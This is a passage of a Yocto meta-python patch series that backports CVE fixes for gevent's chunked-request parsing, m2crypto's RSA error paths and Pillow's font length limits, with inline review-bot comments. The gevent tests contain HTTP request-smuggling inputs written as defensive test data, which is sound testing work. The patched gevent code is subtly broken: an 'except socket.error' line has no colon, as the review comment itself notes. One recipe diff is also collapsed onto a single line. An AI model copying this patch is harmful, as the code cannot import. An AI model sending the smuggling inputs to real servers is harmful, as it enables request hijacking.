+- # a ; or newline. If at any time we read a non-HEX digit, we bail. If we hit a
+- # ;, indicating an chunk-extension, we'll read up to the next
+- # MAX_REQUEST_LINE characters
+- # looking for the CRLF, and if we don't find it, we bail. If we read more than 16 hex characters,
+- # (the number needed to represent a 64-bit chunk size), we bail (this protects us from
+- # a client that sends an infinite stream of `F`, for example).
++ # Here's the production for a chunk (actually the whole body):
++ # (https://www.rfc-editor.org/rfc/rfc7230#section-4.1)
++
++ # chunked-body = *chunk
++ # last-chunk
++ # trailer-part
++ # CRLF
++ #
++ # chunk = chunk-size [ chunk-ext ] CRLF
++ # chunk-data CRLF
++ # chunk-size = 1*HEXDIG
++ # last-chunk = 1*("0") [ chunk-ext ] CRLF
++ # trailer-part = *( header-field CRLF )
++ # chunk-data = 1*OCTET ; a sequence of chunk-size octets
++
++ # To cope with malicious or broken clients that fail to send
++ # valid chunk lines, the strategy is to read character by
++ # character until we either reach a ; or newline. If at any
++ # time we read a non-HEX digit, we bail. If we hit a ;,
++ # indicating an chunk-extension, we'll read up to the next
++ # MAX_REQUEST_LINE characters ("A server ought to limit the
++ # total length of chunk extensions received") looking for the
++ # CRLF, and if we don't find it, we bail. If we read more than
++ # 16 hex characters, (the number needed to represent a 64-bit
++ # chunk size), we bail (this protects us from a client that
++ # sends an infinite stream of `F`, for example).
+
+ buf = BytesIO()
+ while 1:
+@@ -228,16 +272,20 @@ class Input(object):
+ if not char:
+ self._chunked_input_error = True
+ raise _InvalidClientInput("EOF before chunk end reached")
+- if char == b'\r':
+- break
+- if char == b';':
++
++ if char in (
++ b'\r', # Beginning EOL
++ b';', # Beginning extension
++ ):
+ break
+
+- if char not in _HEX:
++ if char not in _HEX: # Invalid data.
+ self._chunked_input_error = True
+ raise _InvalidClientInput("Non-hex data", char)
++
+ buf.write(char)
+- if buf.tell() > 16:
++
++ if buf.tell() > 16: # Too many hex bytes
+ self._chunked_input_error = True
+ raise _InvalidClientInput("Chunk-size too large.")
+
+@@ -257,11 +305,72 @@ class Input(object):
+ if char == b'\r':
+ # We either got here from the main loop or from the
+ # end of an extension
++ self.__read_chunk_size_crlf(rfile, newline_only=True)
++ result = int(buf.getvalue(), 16)
++ if result == 0:
++ # The only time a chunk size of zero is allowed is the final
++ # chunk. It is either followed by another \r\n, or some trailers
++ # which are then followed by \r\n.
++ while self.__read_chunk_trailer(rfile):
++ pass
++ return result
++
++ # Trailers have the following production (they are a header-field followed by CRLF)
++ # See above for the definition of "token".
++ #
++ # header-field = field-name ":" OWS field-value OWS
++ # field-name = token
++ # field-value = *( field-content / obs-fold )
++ # field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ]
++ # field-vchar = VCHAR / obs-text
++ # obs-fold = CRLF 1*( SP / HTAB )
++ # ; obsolete line folding
++ # ; see Section 3.2.4
++
++
++ def __read_chunk_trailer(self, rfile, ):
++ # With rfile positioned just after a \r\n, read a trailer line.
++ # Return a true value if a non-empty trailer was read, and
++ # return false if an empty trailer was read (meaning the trailers are
++ # done).
++ # If a single line exceeds the MAX_REQUEST_LINE, raise an exception.
++ # If the field-name portion contains invalid characters, raise an exception.
++
++ i = 0
++ empty = True
++ seen_field_name = False
++ while i < MAX_REQUEST_LINE:
++ char = rfile.read(1)
++ if char == b'\r':
++ # Either read the next \n or raise an error.
++ self.__read_chunk_size_crlf(rfile, newline_only=True)
++ break
++ # Not a \r, so we are NOT an empty chunk.
++ empty = False
++ if char == b':' and i > 0:
++ # We're ending the field-name part; stop validating characters.
++ # Unless : was the first character...
++ seen_field_name = True
++ if not seen_field_name and char not in _ALLOWED_TOKEN_CHARS:
++ raise _InvalidClientInput('Invalid token character: %r' % (char,))
++ i += 1
++ else:
++ # We read too much
++ self._chunked_input_error = True
++ raise _InvalidClientInput("Too large chunk trailer")
++ return not empty
++
++ def __read_chunk_size_crlf(self, rfile, newline_only=False):
++ # Also for safety, correctly verify that we get \r\n when expected.
++ if not newline_only:
+ char = rfile.read(1)
+- if char != b'\n':
++ if char != b'\r':
+ self._chunked_input_error = True
+- raise _InvalidClientInput("Line didn't end in CRLF")
+- return int(buf.getvalue(), 16)
++ raise _InvalidClientInput("Line didn't end in CRLF: %r" % (char,))
++ char = rfile.read(1)
++ if char != b'\n':
++ self._chunked_input_error = True
++ raise _InvalidClientInput("Line didn't end in LF: %r" % (char,))
+
+ def _chunked_read(self, length=None, use_readline=False):
+ # pylint:disable=too-many-branches
+@@ -294,7 +403,7 @@ class Input(object):
+
+ self.position += datalen
+ if self.chunk_length == self.position:
+- rfile.readline()
++ self.__read_chunk_size_crlf(rfile)
+
+ if length is not None:
+ length -= datalen
+@@ -307,9 +416,9 @@ class Input(object):
+ # determine the next size to read
+ self.chunk_length = self.__read_chunk_length(rfile)
+ self.position = 0
+- if self.chunk_length == 0:
+- # Last chunk. Terminates with a CRLF.
+- rfile.readline()
++ # If chunk_length was 0, we already read any trailers and
++ # validated that we have ended with \r\n\r\n.
++
+ return b''.join(response)
+
+ def read(self, length=None):
+@@ -532,7 +641,8 @@ class WSGIHandler(object):
+ elif len(words) == 2:
+ self.command, self.path = words
+ if self.command != "GET":
+- raise _InvalidClientRequest('Expected GET method: %r' % (raw_requestline,))
++ raise _InvalidClientRequest('Expected GET method; Got command=%r; path=%r; raw=%r' % (
++ self.command, self.path, raw_requestline,))
+ self.request_version = "HTTP/0.9"
+ # QQQ I'm pretty sure we can drop support for HTTP/0.9
+ else:
+@@ -1000,14 +1110,28 @@ class WSGIHandler(object):
+ finally:
+ try:
+ self.wsgi_input._discard()
+- except (socket.error, IOError):
+- # Don't let exceptions during discarding
++ except _InvalidClientInput:
++ # This one is deliberately raised to the outer
++ # scope, because, with the incoming stream in some bad state,
++ # we can't be sure we can synchronize and properly parse the next
++ # request.
++ raise
++ except socket.error
++ # Don't let socket exceptions during discarding
+ # input override any exception that may have been
+ # raised by the application, such as our own _InvalidClientInput.
+ # In the general case, these aren't even worth logging (see the comment
+ # just below)
+ pass
+- except _InvalidClientInput:
++ except _InvalidClientInput as ex:
++ # DO log this one because:
++ # - Some of the data may have been read and acted on by the
++ # application;
++ # - The response may or may not have been sent;
++ # - It's likely that the client is bad, or malicious, and
++ # users might wish to take steps to block the client.
++ self._handle_client_error(ex)
++ self.close_connection = True
+ self._send_error_response_if_possible(400)
+ except socket.error as ex:
+ if ex.args[0] in self.ignored_socket_errors:
+@@ -1054,17 +1178,22 @@ class WSGIHandler(object):
+ def _handle_client_error(self, ex):
+ # Called for invalid client input
+ # Returns the appropriate error response.
+- if not isinstance(ex, ValueError):
++ if not isinstance(ex, (ValueError, _InvalidClientInput)):
+ # XXX: Why not self._log_error to send it through the loop's
+ # handle_error method?
++ # _InvalidClientRequest is a ValueError; _InvalidClientInput is an IOError.
+ traceback.print_exc()
+ if isinstance(ex, _InvalidClientRequest):
+ # No formatting needed, that's already been handled. In fact, because the
+ # formatted message contains user input, it might have a % in it, and attempting
+ # to format that with no arguments would be an error.
+- self.log_error(ex.formatted_message)
++ # However, the error messages do not include the requesting IP
++ # necessarily, so we do add that.
++ self.log_error('(from %s) %s', self.client_address, ex.formatted_message)
+ else:
+- self.log_error('Invalid request: %s', str(ex) or ex.__class__.__name__)
++ self.log_error('Invalid request (from %s): %s',
++ self.client_address,
++ str(ex) or ex.__class__.__name__)
+ return ('400', _BAD_REQUEST_RESPONSE)
+
+ def _headers(self):
+diff --git a/src/gevent/subprocess.py b/src/gevent/subprocess.py
+index 38c9bd3..8a8ccad 100644
+--- a/src/gevent/subprocess.py
++++ b/src/gevent/subprocess.py
+@@ -352,10 +352,11 @@ def check_output(*popenargs, **kwargs):
+
+ To capture standard error in the result, use ``stderr=STDOUT``::
+
+- >>> print(check_output(["/bin/sh", "-c",
++ >>> output = check_output(["/bin/sh", "-c",
+ ... "ls -l non_existent_file ; exit 0"],
+- ... stderr=STDOUT).decode('ascii').strip())
+- ls: non_existent_file: No such file or directory
++ ... stderr=STDOUT).decode('ascii').strip()
++ >>> print(output.rsplit(':', 1)[1].strip())
++ No such file or directory
+
+ There is an additional optional argument, "input", allowing you to
+ pass a string to the subprocess's stdin. If you use this argument
+diff --git a/src/gevent/testing/testcase.py b/src/gevent/testing/testcase.py
+index cd5db80..aa86dcf 100644
+--- a/src/gevent/testing/testcase.py
++++ b/src/gevent/testing/testcase.py
+@@ -225,7 +225,7 @@ class TestCaseMetaClass(type):
+ classDict.pop(key)
+ # XXX: When did we stop doing this?
+ #value = wrap_switch_count_check(value)
+- value = _wrap_timeout(timeout, value)
++ #value = _wrap_timeout(timeout, value)
+ error_fatal = getattr(value, 'error_fatal', error_fatal)
+ if error_fatal:
+ value = errorhandler.wrap_error_fatal(value)
+diff --git a/src/gevent/tests/test__pywsgi.py b/src/gevent/tests/test__pywsgi.py
+index d2125a8..d46030b 100644
+--- a/src/gevent/tests/test__pywsgi.py
++++ b/src/gevent/tests/test__pywsgi.py
+@@ -25,21 +25,11 @@ from gevent import monkey
+ monkey.patch_all()
+
+ from contextlib import contextmanager
+-try:
+- from urllib.parse import parse_qs
+-except ImportError:
+- # Python 2
+- from urlparse import parse_qs
++from urllib.parse import parse_qs
+ import os
+ import sys
+-try:
+- # On Python 2, we want the C-optimized version if
+- # available; it has different corner-case behaviour than
+- # the Python implementation, and it used by socket.makefile
+- # by default.
+- from cStringIO import StringIO
+-except ImportError:
+- from io import BytesIO as StringIO
++from io import BytesIO as StringIO
++
+ import weakref
+ import unittest
+ from wsgiref.validate import validator
+@@ -156,6 +146,10 @@ class Response(object):
+ @classmethod
+ def read(cls, fd, code=200, reason='default', version='1.1',
+ body=None, chunks=None, content_length=None):
++ """
++ Read an HTTP response, optionally perform assertions,
++ and return the Response object.
++ """
+ # pylint:disable=too-many-branches
+ _status_line, headers = read_headers(fd)
+ self = cls(_status_line, headers)
+@@ -716,7 +710,14 @@ class TestNegativeReadline(TestCase):
+
+ class TestChunkedPost(TestCase):
+
++ calls = 0
++
++ def setUp(self):
++ super().setUp()
++ self.calls = 0
++
+ def application(self, env, start_response):
++ self.calls += 1
+ self.assertTrue(env.get('wsgi.input_terminated'))
+ start_response('200 OK', [('Content-Type', 'text/plain')])
+ if env['PATH_INFO'] == '/a':
+@@ -730,6 +731,8 @@ class TestChunkedPost(TestCase):
+ if env['PATH_INFO'] == '/c':
+ return list(iter(lambda: env['wsgi.input'].read(1), b''))
+
++ return [b'We should not get here', env['PATH_INFO'].encode('ascii')]
++
+ def test_014_chunked_post(self):
+ data = (b'POST /a HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n'
+ b'Transfer-Encoding: chunked\r\n\r\n'
+@@ -797,6 +800,170 @@ class TestChunkedPost(TestCase):
+ fd.write(data)
+ read_http(fd, code=400)
+
++ def test_trailers_keepalive_ignored(self):
++ # Trailers after a chunk are ignored.
++ data = (
++ b'POST /a HTTP/1.1\r\n'
++ b'Host: localhost\r\n'
++ b'Connection: keep-alive\r\n'
++ b'Transfer-Encoding: chunked\r\n'
++ b'\r\n'
++ b'2\r\noh\r\n'
++ b'4\r\n hai\r\n'
++ b'0\r\n' # last-chunk
++ # Normally the final CRLF would go here, but if you put in a
++ # trailer, it doesn't.
++ b'trailer1: value1\r\n'
++ b'trailer2: value2\r\n'
++ b'\r\n' # Really terminate the chunk.
++ b'POST /a HTTP/1.1\r\n'
++ b'Host: localhost\r\n'
++ b'Connection: close\r\n'
++ b'Transfer-Encoding: chunked\r\n'
++ b'\r\n'
++ b'2\r\noh\r\n'
++ b'4\r\n bye\r\n'
++ b'0\r\n' # last-chunk
++ )
++ with self.makefile() as fd:
++ fd.write(data)
++ read_http(fd, body='oh hai')
++ read_http(fd, body='oh bye')
++
++ self.assertEqual(self.calls, 2)
++
++ def test_trailers_too_long(self):
++ # Trailers after a chunk are ignored.
++ data = (
++ b'POST /a HTTP/1.1\r\n'
++ b'Host: localhost\r\n'
++ b'Connection: keep-alive\r\n'
++ b'Transfer-Encoding: chunked\r\n'
++ b'\r\n'
++ b'2\r\noh\r\n'
++ b'4\r\n hai\r\n'
++ b'0\r\n' # last-chunk
++ # Normally the final CRLF would go here, but if you put in a
++ # trailer, it doesn't.
++ b'trailer2: value2' # not lack of \r\n
++ )
++ data += b't' * pywsgi.MAX_REQUEST_LINE
++ # No termination, because we detect the trailer as being too
++ # long and abort the connection.
++ with self.makefile() as fd:
++ fd.write(data)
++ read_http(fd, body='oh hai')
++ with self.assertRaises(ConnectionClosed):
++ read_http(fd, body='oh bye')
++
++ def test_trailers_request_smuggling_missing_last_chunk_keep_alive(self):
++ # When something that looks like a request line comes in the trailer
++ # as the first line, immediately after an invalid last chunk.
++ # We detect this and abort the connection, because the
++ # whitespace in the GET line isn't a legal part of a trailer.
++ # If we didn't abort the connection, then, because we specified
++ # keep-alive, the server would be hanging around waiting for more input.
++ data = (
++ b'POST /a HTTP/1.1\r\n'
++ b'Host: localhost\r\n'
++ b'Connection: keep-alive\r\n'
++ b'Transfer-Encoding: chunked\r\n'
++ b'\r\n'
++ b'2\r\noh\r\n'
++ b'4\r\n hai\r\n'
++ b'0' # last-chunk, but missing the \r\n
++ # Normally the final CRLF would go here, but if you put in a
++ # trailer, it doesn't.
++ # b'\r\n'
++ b'GET /path2?a=:123 HTTP/1.1\r\n'
++ b'Host: a.com\r\n'
++ b'Connection: close\r\n'
++ b'\r\n'
++ )
++ with self.makefile() as fd:
++ fd.write(data)
++ read_http(fd, body='oh hai')
++ with self.assertRaises(ConnectionClosed):
++ read_http(fd)
++
++ self.assertEqual(self.calls, 1)
++
++ def test_trailers_request_smuggling_missing_last_chunk_close(self):
++ # Same as the above, except the trailers are actually valid
++ # and since we ask to close the connection we don't get stuck
++ # waiting for more input.
++ data = (
++ b'POST /a HTTP/1.1\r\n'
++ b'Host: localhost\r\n'
++ b'Connection: close\r\n'
++ b'Transfer-Encoding: chunked\r\n'
++ b'\r\n'
++ b'2\r\noh\r\n'
++ b'4\r\n hai\r\n'
++ b'0\r\n' # last-chunk
++ # Normally the final CRLF would go here, but if you put in a
++ # trailer, it doesn't.
++ # b'\r\n'
++ b'GETpath2a:123 HTTP/1.1\r\n'
++ b'Host: a.com\r\n'
++ b'Connection: close\r\n'
++ b'\r\n'
++ )
++ with self.makefile() as fd:
++ fd.write(data)
++ read_http(fd, body='oh hai')
++ with self.assertRaises(ConnectionClosed):
++ read_http(fd)
++
++ def test_trailers_request_smuggling_header_first(self):
++ # When something that looks like a header comes in the first line.
++ data = (
++ b'POST /a HTTP/1.1\r\n'
++ b'Host: localhost\r\n'
++ b'Connection: keep-alive\r\n'
++ b'Transfer-Encoding: chunked\r\n'
++ b'\r\n'
++ b'2\r\noh\r\n'
++ b'4\r\n hai\r\n'
++ b'0\r\n' # last-chunk, but only one CRLF
++ b'Header: value\r\n'
++ b'GET /path2?a=:123 HTTP/1.1\r\n'
++ b'Host: a.com\r\n'
++ b'Connection: close\r\n'
++ b'\r\n'
++ )
++ with self.makefile() as fd:
++ fd.write(data)
++ read_http(fd, body='oh hai')
++ with self.assertRaises(ConnectionClosed):
++ read_http(fd, code=400)
++
++ self.assertEqual(self.calls, 1)
++
++ def test_trailers_request_smuggling_request_terminates_then_header(self):
++ data = (
++ b'POST /a HTTP/1.1\r\n'
++ b'Host: localhost\r\n'
++ b'Connection: keep-alive\r\n'
++ b'Transfer-Encoding: chunked\r\n'
++ b'\r\n'
++ b'2\r\noh\r\n'
++ b'4\r\n hai\r\n'
++ b'0\r\n' # last-chunk
++ b'\r\n'
++ b'Header: value'
++ b'GET /path2?a=:123 HTTP/1.1\r\n'
++ b'Host: a.com\r\n'
++ b'Connection: close\r\n'
++ b'\r\n'
++ )
++ with self.makefile() as fd:
++ fd.write(data)
++ read_http(fd, body='oh hai')
++ read_http(fd, code=400)
++
++ self.assertEqual(self.calls, 1)
++
+
+ class TestUseWrite(TestCase):
+
+--
+2.40.0
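Review bot: In the `-1000,14 +1110,28` hunk of src/gevent/pywsgi.py inside CVE-2023-41419.patch, the added line `except socket.error` has no trailing colon, so as shown here the patched module is a SyntaxError and `gevent.pywsgi` could not be imported at all. It should read `except socket.error:`, matching the `except _InvalidClientInput:` clause added directly above it. Byte-compilation during packaging may only log such an error rather than fail the build, so compiling the patched file (for example with `python3 -m py_compile`) or importing `gevent.pywsgi` in a ptest would be a useful check before this ships. The enclosing method starts and ends outside the hunk.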
diff --git a/meta-python/recipes-devtools/python/python3-gevent_21.12.0.bb b/meta-python/recipes-devtools/python/python3-gevent_21.12.0.bb
index 9efeec4d9f..fd6b0f531a 100644
--- a/meta-python/recipes-devtools/python/python3-gevent_21.12.0.bb
+++ b/meta-python/recipes-devtools/python/python3-gevent_21.12.0.bb
@@ -13,6 +13,8 @@ RDEPENDS:${PN} = "${PYTHON_PN}-greenlet \
 SRC_URI[sha256sum] = "f48b64578c367b91fa793bf8eaaaf4995cb93c8bc45860e473bf868070ad094e"
+SRC_URI += "file://CVE-2023-41419.patch"
+
 inherit pypi setuptools3
 # Don't embed libraries, link to the system instead
diff --git a/meta-python/recipes-devtools/python/python3-kivy_2.1.0..bb b/meta-python/recipes-devtools/python/python3-kivy_2.1.0..bb
index 684bca03e1..b02c55a85b 100644
--- a/meta-python/recipes-devtools/python/python3-kivy_2.1.0..bb
+++ b/meta-python/recipes-devtools/python/python3-kivy_2.1.0..bb
@@ -43,7 +43,9 @@ export KIVY_GRAPHICS
 KIVY_CROSS_SYSROOT="${RECIPE_SYSROOT}"
 export KIVY_CROSS_SYSROOT
-REQUIRED_DISTRO_FEATURES += "x11 opengl"
+REQUIRED_DISTRO_FEATURES += "opengl gobject-introspection-data"
+
+ANY_OF_DISTRO_FEATURES = "x11 wayland"
 DEPENDS += " \
 gstreamer1.0 \
diff --git a/meta-python/recipes-devtools/python/python3-m2crypto/CVE-2020-25657.patch b/meta-python/recipes-devtools/python/python3-m2crypto/CVE-2020-25657.patch
new file mode 100644
index 0000000000..cc915f1478
--- /dev/null
+++ b/meta-python/recipes-devtools/python/python3-m2crypto/CVE-2020-25657.patch
@@ -0,0 +1,175 @@
+From 2fa92e048b76fcc7bf2d4f4443478c8292d17470 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Mat=C4=9Bj=20Cepl?= <mcepl@cepl.eu>
+Date: Thu, 1 Jun 2023 14:56:34 +0000
+Subject: [PATCH] Mitigate the Bleichenbacher timing attacks in the RSA
+ decryption API (CVE-2020-25657)
+
+Fixes #282
+
+CVE: CVE-2020-25657
+
+Upstream-Status: Backport [https://gitlab.com/m2crypto/m2crypto/-/commit/84c53958def0f510e92119fca14d74f94215827a]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+ src/SWIG/_m2crypto_wrap.c | 20 ++++++++++++--------
+ src/SWIG/_rsa.i | 20 ++++++++++++--------
+ tests/test_rsa.py | 15 +++++++--------
+ 3 files changed, 31 insertions(+), 24 deletions(-)
+
+diff --git a/src/SWIG/_m2crypto_wrap.c b/src/SWIG/_m2crypto_wrap.c
+index 3db88b9..6aafe1f 100644
+--- a/src/SWIG/_m2crypto_wrap.c
++++ b/src/SWIG/_m2crypto_wrap.c
+@@ -7129,9 +7129,10 @@ PyObject *rsa_private_encrypt(RSA *rsa, PyObject *from, int padding) {
+ tlen = RSA_private_encrypt(flen, (unsigned char *)fbuf,
+ (unsigned char *)tbuf, rsa, padding);
+ if (tlen == -1) {
+- m2_PyErr_Msg(_rsa_err);
++ ERR_clear_error();
++ PyErr_Clear();
+ PyMem_Free(tbuf);
+- return NULL;
++ Py_RETURN_NONE;
+ }
+
+ ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen);
+@@ -7159,9 +7160,10 @@ PyObject *rsa_public_decrypt(RSA *rsa, PyObject *from, int padding) {
+ tlen = RSA_public_decrypt(flen, (unsigned char *)fbuf,
+ (unsigned char *)tbuf, rsa, padding);
+ if (tlen == -1) {
+- m2_PyErr_Msg(_rsa_err);
++ ERR_clear_error();
++ PyErr_Clear();
+ PyMem_Free(tbuf);
+- return NULL;
++ Py_RETURN_NONE;
+ }
+
+ ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen);
+@@ -7186,9 +7188,10 @@ PyObject *rsa_public_encrypt(RSA *rsa, PyObject *from, int padding) {
+ tlen = RSA_public_encrypt(flen, (unsigned char *)fbuf,
+ (unsigned char *)tbuf, rsa, padding);
+ if (tlen == -1) {
+- m2_PyErr_Msg(_rsa_err);
++ ERR_clear_error();
++ PyErr_Clear();
+ PyMem_Free(tbuf);
+- return NULL;
++ Py_RETURN_NONE;
+ }
+
+ ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen);
+@@ -7213,9 +7216,10 @@ PyObject *rsa_private_decrypt(RSA *rsa, PyObject *from, int padding) {
+ tlen = RSA_private_decrypt(flen, (unsigned char *)fbuf,
+ (unsigned char *)tbuf, rsa, padding);
+ if (tlen == -1) {
+- m2_PyErr_Msg(_rsa_err);
++ ERR_clear_error();
++ PyErr_Clear();
+ PyMem_Free(tbuf);
+- return NULL;
++ Py_RETURN_NONE;
+ }
+ ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen);
+
+diff --git a/src/SWIG/_rsa.i b/src/SWIG/_rsa.i
+index bc714e0..1377b8b 100644
+--- a/src/SWIG/_rsa.i
++++ b/src/SWIG/_rsa.i
+@@ -239,9 +239,10 @@ PyObject *rsa_private_encrypt(RSA *rsa, PyObject *from, int padding) {
+ tlen = RSA_private_encrypt(flen, (unsigned char *)fbuf,
+ (unsigned char *)tbuf, rsa, padding);
+ if (tlen == -1) {
+- m2_PyErr_Msg(_rsa_err);
++ ERR_clear_error();
++ PyErr_Clear();
+ PyMem_Free(tbuf);
+- return NULL;
++ Py_RETURN_NONE;
+ }
+
+ ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen);
+@@ -269,9 +270,10 @@ PyObject *rsa_public_decrypt(RSA *rsa, PyObject *from, int padding) {
+ tlen = RSA_public_decrypt(flen, (unsigned char *)fbuf,
+ (unsigned char *)tbuf, rsa, padding);
+ if (tlen == -1) {
+- m2_PyErr_Msg(_rsa_err);
++ ERR_clear_error();
++ PyErr_Clear();
+ PyMem_Free(tbuf);
+- return NULL;
++ Py_RETURN_NONE;
+ }
+
+ ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen);
+@@ -296,9 +298,10 @@ PyObject *rsa_public_encrypt(RSA *rsa, PyObject *from, int padding) {
+ tlen = RSA_public_encrypt(flen, (unsigned char *)fbuf,
+ (unsigned char *)tbuf, rsa, padding);
+ if (tlen == -1) {
+- m2_PyErr_Msg(_rsa_err);
++ ERR_clear_error();
++ PyErr_Clear();
+ PyMem_Free(tbuf);
+- return NULL;
++ Py_RETURN_NONE;
+ }
+
+ ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen);
+@@ -323,9 +326,10 @@ PyObject *rsa_private_decrypt(RSA *rsa, PyObject *from, int padding) {
+ tlen = RSA_private_decrypt(flen, (unsigned char *)fbuf,
+ (unsigned char *)tbuf, rsa, padding);
+ if (tlen == -1) {
+- m2_PyErr_Msg(_rsa_err);
++ ERR_clear_error();
++ PyErr_Clear();
+ PyMem_Free(tbuf);
+- return NULL;
++ Py_RETURN_NONE;
+ }
+ ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen);
+
+diff --git a/tests/test_rsa.py b/tests/test_rsa.py
+index 7bb3af7..5e75d68 100644
+--- a/tests/test_rsa.py
++++ b/tests/test_rsa.py
+@@ -109,8 +109,9 @@ class RSATestCase(unittest.TestCase):
+ # The other paddings.
+ for padding in self.s_padding_nok:
+ p = getattr(RSA, padding)
+- with self.assertRaises(RSA.RSAError):
+- priv.private_encrypt(self.data, p)
++ # Exception disabled as a part of mitigation against CVE-2020-25657
++ # with self.assertRaises(RSA.RSAError):
++ priv.private_encrypt(self.data, p)
+ # Type-check the data to be encrypted.
+ with self.assertRaises(TypeError):
+ priv.private_encrypt(self.gen_callback, RSA.pkcs1_padding)
+@@ -127,10 +128,12 @@ class RSATestCase(unittest.TestCase):
+ self.assertEqual(ptxt, self.data)
+
+ # no_padding
+- with six.assertRaisesRegex(self, RSA.RSAError, 'data too small'):
+- priv.public_encrypt(self.data, RSA.no_padding)
++ # Exception disabled as a part of mitigation against CVE-2020-25657
++ # with six.assertRaisesRegex(self, RSA.RSAError, 'data too small'):
++ priv.public_encrypt(self.data, RSA.no_padding)
+
+ # Type-check the data to be encrypted.
++ # Exception disabled as a part of mitigation against CVE-2020-25657
+ with self.assertRaises(TypeError):
+ priv.public_encrypt(self.gen_callback, RSA.pkcs1_padding)
+
+@@ -146,10 +149,6 @@ class RSATestCase(unittest.TestCase):
+ b'\000\000\000\003\001\000\001') # aka 65537 aka 0xf4
+ with self.assertRaises(RSA.RSAError):
+ setattr(rsa, 'e', '\000\000\000\003\001\000\001')
+- with self.assertRaises(RSA.RSAError):
+- rsa.private_encrypt(1)
+- with self.assertRaises(RSA.RSAError):
+- rsa.private_decrypt(1)
+ assert rsa.check_key()
+
+ def test_loadpub_bad(self):
+--
+2.40.0
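Review bot: The `tlen == -1` branch in all four wrappers (`rsa_private_encrypt`, `rsa_public_decrypt`, `rsa_public_encrypt`, `rsa_private_decrypt`, in `_rsa.i` and in the generated `_m2crypto_wrap.c`) now clears both error queues and returns `None`, so every failure, including the encrypt-side ones, reaches Python as an ordinary return value rather than `RSA.RSAError`. Callers that relied on the exception will carry `None` forward, so each call site needs an explicit `is None` check, and the decrypt paths should handle `None` and a wrong plaintext the same way for the mitigation to hold (presumably that is the intent; the callers are not part of this patch). The updated `tests/test_rsa.py` does not pin the new contract: `priv.private_encrypt(self.data, p)` and `priv.public_encrypt(self.data, RSA.no_padding)` are called with no assertion, where `self.assertIsNone(priv.private_encrypt(self.data, p))` would. The added `# Exception disabled as a part of mitigation against CVE-2020-25657` above `with self.assertRaises(TypeError):` is misplaced, since that assertion is still active. The wrapper bodies start and end outside the inner hunks.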
diff --git a/meta-python/recipes-devtools/python/python3-m2crypto_0.38.0.bb b/meta-python/recipes-devtools/python/python3-m2crypto_0.38.0.bb index 51a0dd676e..155a9066ca 100644 --- a/meta-python/recipes-devtools/python/python3-m2crypto_0.38.0.bb +++ b/meta-python/recipes-devtools/python/python3-m2crypto_0.38.0.bb @@ -10,6 +10,7 @@ SRC_URI += "file://0001-setup.py-link-in-sysroot-not-in-host-directories.patch \ file://cross-compile-platform.patch \ file://avoid-host-contamination.patch \ file://0001-setup.py-address-openssl-3.x-build-issue.patch \ + file://CVE-2020-25657.patch \ " SRC_URI[sha256sum] = "99f2260a30901c949a8dc6d5f82cd5312ffb8abc92e76633baf231bbbcb2decb" diff --git a/meta-python/recipes-devtools/python/python3-oauthlib_3.2.0.bb b/meta-python/recipes-devtools/python/python3-oauthlib_3.2.2.bb index e7f7f0b47b..566279d71c 100644 --- a/meta-python/recipes-devtools/python/python3-oauthlib_3.2.0.bb +++ b/meta-python/recipes-devtools/python/python3-oauthlib_3.2.2.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/idan/oauthlib" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=abd2675e944a2011aed7e505290ba482" -SRC_URI[sha256sum] = "23a8208d75b902797ea29fd31fa80a15ed9dc2c6c16fe73f5d346f83f6fa27a2" +SRC_URI[sha256sum] = "9859c40929662bec5d64f34d01c99e093149682a3f38915dc0655d5a633dd918" inherit pypi setuptools3 diff --git a/meta-python/recipes-devtools/python/python3-pillow/CVE-2023-44271.patch b/meta-python/recipes-devtools/python/python3-pillow/CVE-2023-44271.patch new file mode 100644 index 0000000000..ad51f17288 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-pillow/CVE-2023-44271.patch 
@@ -0,0 +1,156 @@
+From 1fe1bb49c452b0318cad12ea9d97c3bef188e9a7 Mon Sep 17 00:00:00 2001
+From: Andrew Murray <radarhere@users.noreply.github.com>
+Date: Fri, 30 Jun 2023 23:32:26 +1000
+Subject: [PATCH] Added ImageFont.MAX_STRING_LENGTH
+
+Upstream-status: Backport [https://github.com/python-pillow/Pillow/commit/1fe1bb49c452b0318cad12ea9d97c3bef188e9a7]
+CVE: CVE-2023-44271
+Comment: Refresh hunk for test_imagefont.py, ImageFont.py and
+Remove hunk 10.0.0.rst because in our version it is 9.4.0
+
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+Signed-off-by: Dnyandev Padalkar <padalkards17082001@gmail.com>
+---
+ Tests/test_imagefont.py | 19 +++++++++++++++++++
+ docs/reference/ImageFont.rst | 18 ++++++++++++++++++
+ src/PIL/ImageFont.py | 15 +++++++++++++++
+ 3 files changed, 52 insertions(+)
+
+diff --git a/Tests/test_imagefont.py b/Tests/test_imagefont.py
+index 7fa8ff8cbfd..c50447a153d 100644
+--- a/Tests/test_imagefont.py
++++ b/Tests/test_imagefont.py
+@@ -1107,6 +1107,25 @@
+ assert_image_equal_tofile(im, "Tests/images/text_mono.gif")
+
+
++def test_too_many_characters(font):
++ with pytest.raises(ValueError):
++ font.getlength("A" * 1000001)
++ with pytest.raises(ValueError):
++ font.getbbox("A" * 1000001)
++ with pytest.raises(ValueError):
++ font.getmask2("A" * 1000001)
++
++ transposed_font = ImageFont.TransposedFont(font)
++ with pytest.raises(ValueError):
++ transposed_font.getlength("A" * 1000001)
++
++ default_font = ImageFont.load_default()
++ with pytest.raises(ValueError):
++ default_font.getlength("A" * 1000001)
++ with pytest.raises(ValueError):
++ default_font.getbbox("A" * 1000001)
++
++
+ @pytest.mark.parametrize(
+ "test_file",
+ [
+diff --git a/docs/reference/ImageFont.rst b/docs/reference/ImageFont.rst
+index 946bd3c4bed..2abfa0cc997 100644
+--- a/docs/reference/ImageFont.rst
++++ b/docs/reference/ImageFont.rst
